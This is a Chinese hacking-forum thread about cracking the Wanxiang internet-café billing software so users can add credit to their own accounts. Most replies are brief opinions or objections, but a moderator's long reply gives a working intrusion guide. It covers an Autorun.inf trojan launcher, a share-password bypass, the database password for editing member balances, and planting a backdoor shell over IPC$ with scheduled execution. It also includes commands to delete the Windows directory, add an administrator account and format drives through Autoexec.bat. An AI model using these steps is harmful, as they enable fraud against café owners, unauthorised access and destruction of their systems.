|
 | 作者: yk__47 [yk__47]
 论坛用户 |
登录 |
| 请问破解万象后自己加钱,主机会知道吗? |
| 地主 发表时间: 02/22 21:43 |
 | 回复: wiqe [wiqe] 论坛用户 |
登录 |
|
不会知道的 |
| B1层 发表时间: 02/22 21:46 |
| 回复: yk__47 [yk__47] 论坛用户 |
登录 |
|
一点反映都没有吗? 有硬盘还原卡有没有关系? 还有就是怎么进入硬盘还原卡的设置? |
| B2层 发表时间: 02/22 22:07 |
 | 回复: hard8816 [hard8816]  论坛用户 |
登录 |
|
不会知道。 |
| B3层 发表时间: 03/28 12:41 |
| 回复: adam92013 [adam92013] 论坛用户 |
登录 |
|
当然,主机有记录 既然已经破解了,还何必要加钱 |
| B4层 发表时间: 03/28 13:19 |
| 回复: X-BOY [huwei96] 论坛用户 |
登录 |
|
如何能找到服务端 |
| B5层 发表时间: 03/30 09:36 |
| 回复: xiji [zhzhzhwx] |
登录 |
|
请问怎么自动加钱啊? |
| B6层 发表时间: 03/30 10:49 |
 | 回复: yingfeng11 [yingfeng11] 论坛用户 |
登录 |
|
见鬼了,不会让你们得逞的:P |
| B7层 发表时间: 03/30 12:09 |
 | 回复: yimarong [yimarong]  版主 |
登录 |
|
会知道的! 查记录就看得到的! 最好别搞! 要是你们的万象版本低,用映射的办法不错! |
| B8层 发表时间: 03/30 13:19 |
 | 回复: hcknx [hcknx]  论坛用户 |
登录 |
|
大哥,我想请问你一下怎么破解呀?可以告诉小弟吗?最好是不要手动服务器,在客户机上就可以给自己的帐号加钱。可以告诉小弟吗?谢谢了! |
| B9层 发表时间: 03/30 13:48 |
| 回复: f33778615 [f33778615]  论坛用户 |
登录 |
|
破了之后,还用得着加钱吗?再说我极不支持这样,何必呢?人家老板是要吃喝的,还有好多费用!用得着破吗? |
| B10层 发表时间: 03/30 18:26 |
 | 回复: ltb [ltb] 论坛用户 |
登录 |
|
如果,,你想那样想的花,,组好不要那样做啊了吗\。 学学技术还可以,,, 在自己的电脑上按个万象就可以呢,,在就是把客服端,,那个叫什么 OCPUTS 改名,,就OK 呢!! |
| B11层 发表时间: 03/30 20:59 |
 | 回复: runwin [runwin]  论坛用户 |
登录 |
|
我在想。。。进程没有关开。。。可以改吗?? |
| B12层 发表时间: 03/30 22:12 |
 | 回复: leiyun [leiyun] |
登录 |
|
主机不知道 但老板会知道 |
| B13层 发表时间: 03/30 22:43 |
| 回复: thinbug [thinbug31] 论坛用户 |
登录 |
|
干嘛要这样啊,这是一种不道德的问题,我是不会这样子做的。 没钱上网跟老板说一声就得了,相信老板不会那么小气的 |
| B14层 发表时间: 03/31 14:07 |
| 回复: studio [studio] 论坛用户 |
登录 |
|
会知道的! 上回我在我们这里的网吧上网,她们用的也是万象,我破了密码后推出系统,她们主机知道的,然后网管就来了! |
| B15层 发表时间: 03/31 16:55 |
| 回复: liyouben [liyouben] 论坛用户 |
登录 |
|
哈哈哈~~~~如果网管老是盯着万象管理端的各机状态,你再怎么破都没用。 |
| B16层 发表时间: 04/01 02:30 |
| 回复: awns [awns] 论坛用户 |
登录 |
|
会知道呀!服务器会发生冲突! |
| B17层 发表时间: 04/01 18:24 |
 | 回复: aa [haizhe]  论坛用户 |
登录 |
|
在没有硬盘保护卡的情况 win98状态 开机进入安全模式 然后msconfig 把万象关掉 之后重启 一般启动之后鼠标被锁定 直接冷启 机器会自检 让它自检完成 之后进入win98就没事了 但是你要记住 只能玩一个小时 时间长了会被发现的 |
| B18层 发表时间: 04/01 18:35 |
| 回复: aa [haizhe] 论坛用户 |
登录 |
|
如果你想自己给自己加钱的话你最好先找一个服务器版研究一下 这样比较保险也能节省时间 |
| B19层 发表时间: 04/01 18:36 |
| 回复: zyh2099 [zyh2099] 论坛用户 |
登录 |
|
我是知道的,但我本身就是网吧的网管,我不会告诉你的。你是白痴心呀 |
| B20层 发表时间: 04/01 18:37 |
| 回复: ngkmcom [ngkmcom] 论坛用户 |
登录 |
|
我是网管~~我来告诉你、 如果在我这边上~~~~~~我会知道~ 我最恨这些人~~~没钱说一声~~下次带嘛!~何必呢~~~~`` |
| B21层 发表时间: 04/01 20:40 |
| 回复: yimarong [yimarong] 版主 |
登录 |
|
这里是讨论技术,不是道德撒! 想家钱的到cy07的论坛看看! 包你满意撒! 不过还是不要做,会就行! 个人意见・! 哈哈~ |
| B22层 发表时间: 04/01 21:14 |
 | 回复: boybelt [boybelt] 论坛用户 |
登录 |
|
你想的美呀!让你知道了我的工资不就玩了!去一边凉快吧你!真黑! |
| B23层 发表时间: 04/01 21:59 |
| 回复: snqmyy [snqmyy] 论坛用户 |
登录 |
|
好像不知道哦 |
| B24层 发表时间: 04/01 22:05 |
| 回复: aqkey [aqkey] 论坛用户 |
登录 |
|
那要看你的技术了,我们玩的是技术,知道做法就行,没有必要去真的加什么钱,没用的。况且这种小事,也不值得去做~~ |
| B25层 发表时间: 04/02 21:07 |
| 回复: honggang [honggang] 论坛用户 |
登录 |
|
老板会可怜你才怪呢 |
| B26层 发表时间: 04/02 21:33 |
| 回复: weixin [weixin] 论坛用户 |
登录 |
|
是呀,这里讨论的是技术 而不是道德 进步来自不断的学习 世界没有绝对的好坏之分 |
| B27层 发表时间: 04/03 00:49 |
| 回复: hcknx [hcknx] 论坛用户 |
登录 |
|
兄弟,可以告诉我CY07这个网址的全部网址吗? 谢谢了! |
| B28层 发表时间: 04/03 12:51 |
| 回复: yimarong [yimarong] 版主 |
登录 |
|
今天无意转到这里怎么还没人给你回啊~ 我来加点: 大部分的入侵技术都是利用系统本身的漏洞进行的,而其中的关键就是人――网 络管理员的素质,管理员的技术素质,工作态度在很大的程度上会左右系统的安 全性能。 本文以万象网吧管理专家系统为例,描述笔者是如何破解万象网管软件的。万象 中最为重要的一个文件是名为“OctLog.mdb”数据库文件,他记录了万象的会员 数据,有会员资料,会员卡号,余额等等的敏感数据如果这个文件一旦被用心不 良的人截获并肆意修改,那后果是非常严重的。所以这里提醒网吧管理员,必须 保护好你的会员数据库。 下面是笔者重破解者的角度来描述整个破解过程,让你领会一次因配置适当而导 致的严重漏洞。 一,前期工作 首先的问题就是我们如何接近数据库文件“OctLog.mdb”。这里我们简单的分析 一下,现在的网吧一般不安装万象服务器版(收银端)在C盘,原因是担心系统出 现问题丢失数据,大部分安装在C盘以外,例如安装在“D:OCTOPUS".所以我们要 确定网吧的主机是那一台,安装了“OctPUS”的盘有没有共享?如果安装了 “OctPUS”的盘没有共享,想办法让“OctLog.mdb”被共享,可能你觉得共享了 “OctLog.mdb”的网吧不会有,但我觉得这样的网吧是用很多的,说不定你用的 网吧就是,那你就……因为现在的网吧管理人员的水平也不是很高的。即使有的 网吧暂时$共享“OctLog.mdb”也不要灰心,有时候网吧人员变动,主机的设置 也有可能变动,这时候也是有机会的…… 1,Autorun,inf文件的妙用 例如如果万象安装在D盘, 而D盘没有共享,但是其他的盘例如E盘共享了,这样 利用光盘自动运行程序的原理,在完全共享(例如E盘)的根目录建立一个 “Autorun.inf”文件,用记事本就可以进行了,文件保存后缀为INF。内容如下 : [autorun] open=木马的路径 这样当有人想打开E盘的时候木马就会自动运行了,这个方法很容易被别人发现, 因为如果不删去“Autorun.inf”文件,管理员双击就进不去E盘了,要进去的话 还要用右键点击才能打开。 2,利用Vredir.vxd文件偷梁换柱 你大部分遇到的网吧可能是D盘加密了的只读共享,在Win98下破解共享密码的方 法很简单,因为在Win98共享目录密码校炼有BUG,只要将一个经过修改的 Vredir.vxd文件COPY到WINDOWSSYSTEM目录覆盖源文件,重新启动电脑以后,你 再进入有密码共享的目录,出现提示输入密码的窗口时不用输入 密码,只要按住 回车键不放就可以进去了!如果网吧安装了还原精灵,我们可以这样做,点击“ 关闭系统”,选择“重新启动计算机”,这时候按住Shift键不放,然后点击重新 启动确定,就可以绕过还原精灵了! 二,精彩部分 1,第一招――直捣黄龙 最幸运的情况就时你遇上了“OctPUS”目录被完全共享,而且网吧客户端安装了 Microsoft Access,这时候入侵最简单了,用客户机Microsoft Access打开收银 机的“OctLog.mdb”,这是提示输入密码,输入“alpha”确定后就会看见了,选 择“打开数据库”确定后再输入一次“alpha”就可以看见如图: 不要管他,点击确定后 之后双击“userlist”就会 看见什么了?会员的资料尽收眼底,“CARDID”下就时会员的卡号,“password ”下就时密码,“remain”就时余下的金额,还有……里面的数据时可以直接修 改的,你可以在你的用户名的金额后面加个0,呵呵!你甚至还可以进行新增会员 ,改变密码等操作。 2,第二招――伪装欺骗 首先去下载万象(下载地址是:http://down.kk66.com/show.asp?id=3680 ;) ,下载后选择安装服务器版, 安装路径不要和客户机安装的路径相同,安装后千万不要运行,当然,如果你不 幸运行了,在不足30秒的时间内,管理员就会站在你的身后……毛骨悚然……。 因为运行之后,“真”的服务端会有提示有另一个服务端在那一台电脑上运行。 所以我们要进行必要的设置,首先将“真”的服务器安装目录映射成本机的一个 驱动器F盘。然后打开本机控制面板的“ODBC数据原(32位)”。选择配置 “Octopus”,然后在出现的对话框中选择“真”服务端的“OctLog.mdb”,点击 “配置”,在出现的图象中选择“选取”。然后在对话框中的数据原选择你映射 在你自己电脑上的数据库,也就是主机的数据原,然后推出。这是俩个服务端就 共用一个同步的数据库了。最后还要打开注册表编辑器,找到“HKEY-LOCAL- MACHINESOFT万象幻境 ”这个键。先在“万象幻境”后新建一个主键“专家系 列网管软件服务器”,服务端暂时未运行,所以这个键要自己添加,然后在“专 家系列网管软件服务器”里面添加一个DWORD值,名称叫:LPORT,数据设为任意 一个值,比如8207。 关掉注册表就大公告成了,这时候打开本机的服务端,会弹出一个对话框,显示 错误提示,我们不用管他,点击“确定”进入后,是看不到任何局域网的计算机 的(这就是前面说的不可能反控的原因),但是可以对会员的数据库进行操作, 二个数据库的操作是同步的,所以就可以对会员卡加钱了,呵呵! 3,第三招―― 值得注意的是,第三招是我在没有实际操作的情况下在猜想的,所以请朋友千万 不是以身使法!既然我们现在要做的仅仅是如何打开“OctLog.mdb”,而在同一 个网络中用服务端打开会被发现,那么我们不可以在另外一个网络中通过服务端 打开呢???我的猜想是:首先是将自己的电脑放在局域网之外,通过修改本机 的IP地址实现!一般局域网的IP地址是192.168.0.1 我可以先将IP地址定为任意值。这时候电脑要求重新启动计算机,点取消,然后 将网卡禁止使用,电脑还是提示重新启动,不要管他,然后再将网卡启动就可以 轻松的改变IP地址了!然后……就看你的了! 先查它的ip IP:61.141.xxx.xxx (方法很多的) 我就打开DOS输入:net use \61.141.xxx.xxxipc$ 提示输入密码: 我估计是空! 直接按下[Enter] 真的被我猜中了! 接着我便继续输入:net use \61.141.xxx.xxxc$ 提示输入密码: 我也没有理会! 谁知道这下不管用了! 找他的弱口令X-SCANNER(冰河的力作。下载地方:http://www.xfocus.org)扫他 我接着就映射他的c盘 net use z: \61.141.xxx.xxxc$ 接着把NETX99放上去! 看他的时间! net time \61.141.xxx.xxx 他的时间是假如是下午3:02分 接着安排他的执行时间! at \61.141.xxx.xxx 15:04 ncx99.exe 命令成功完成! 接下来就是等时间了! OK!到时间了! telnet 61.141.xxx.xxx 99 进入了! c:>rd /s /q WINNT 呵呵! 这时你会发现有很多文件拒绝访问! 不要害怕! 这是很正常的事情! 因为他有很多文件正在调用! 不过他的机器很快就会拼命报错! 直到系统崩溃! 呵呵! 对于一个网吧来说! 这个无疑是一个致命的打击! 没有主机怎么上网? 只有关门了! 呵呵! 接着就是如何获取ADMIN的权限了! 我们首先把他的C盘映射成为我们的Z盘! 开始--运行--cmd 输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名" 出现:命令成功完成 这时候你打开“我的电脑”看看! 是不是多了一个Z盘? 接着不用我多说了吧? 首先必须创建一个你自己的用户名 输入:net user 用户名 "密码" /add 出现:命令成功完成 OK! 接着就是如何把你创建的用户加到ADMIN组了! 输入:net localgroup "administrators" 用户名 /add 出现:命令成功完成 呵呵! 我们把他的WINNT目录删除掉! 回到对方的MS-DOS下! 输入:rd /s /q WINNT 这时你会发现有很多文件拒绝访问! 不要害怕! 这是很正常的事情! 因为他有很多文件正在调用! 不过他的机器很快就会拼命报错! 直到系统崩溃! 够好玩的了吧? 如果对方是WIN98的话你可以把他C盘根目录下的Autoexec.bat文件改一下! 打开他的Autoexec.bat文件! 把原来的全删掉! 输入: -------------------- @echo off format d: /q /u delete d: format c: /q /u delete c: -------------------- 保存! 等他重启后就会慢慢的格掉D盘再格C盘! 呵呵............不要干坏事呀 这都是以前的,现在可能已经不行了! 最新的资料你可以自己找找! |
| B29层 发表时间: 08/04 01:27 |
 | 回复: yjyygywcw [yjyygywcw] 论坛用户 |
登录 |
|
你在哪找到的?教一下我这个笨人呀! |
| B30层 发表时间: 08/06 14:57 |
| 回复: gychinaren [gychinaren] 论坛用户 |
登录 |
|
我说呀 ,这一般人怎么能做到呀 1``不是还得请网管来帮忙吗?~~~ 这不就毁了吗?~~哈哈!~` |
| B31层 发表时间: 05-10-20 13:32 |
| 回复: sadghg [sadghg] 论坛用户 |
登录 |
|
那倒也是哦!会就行````我是想多学点技术哦,有哪位高人来指点指点呀????????????? |
| B32层 发表时间: 05-11-03 21:20 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 网吧专题 标题: 请问破解万象后自己加钱,主机会知道吗?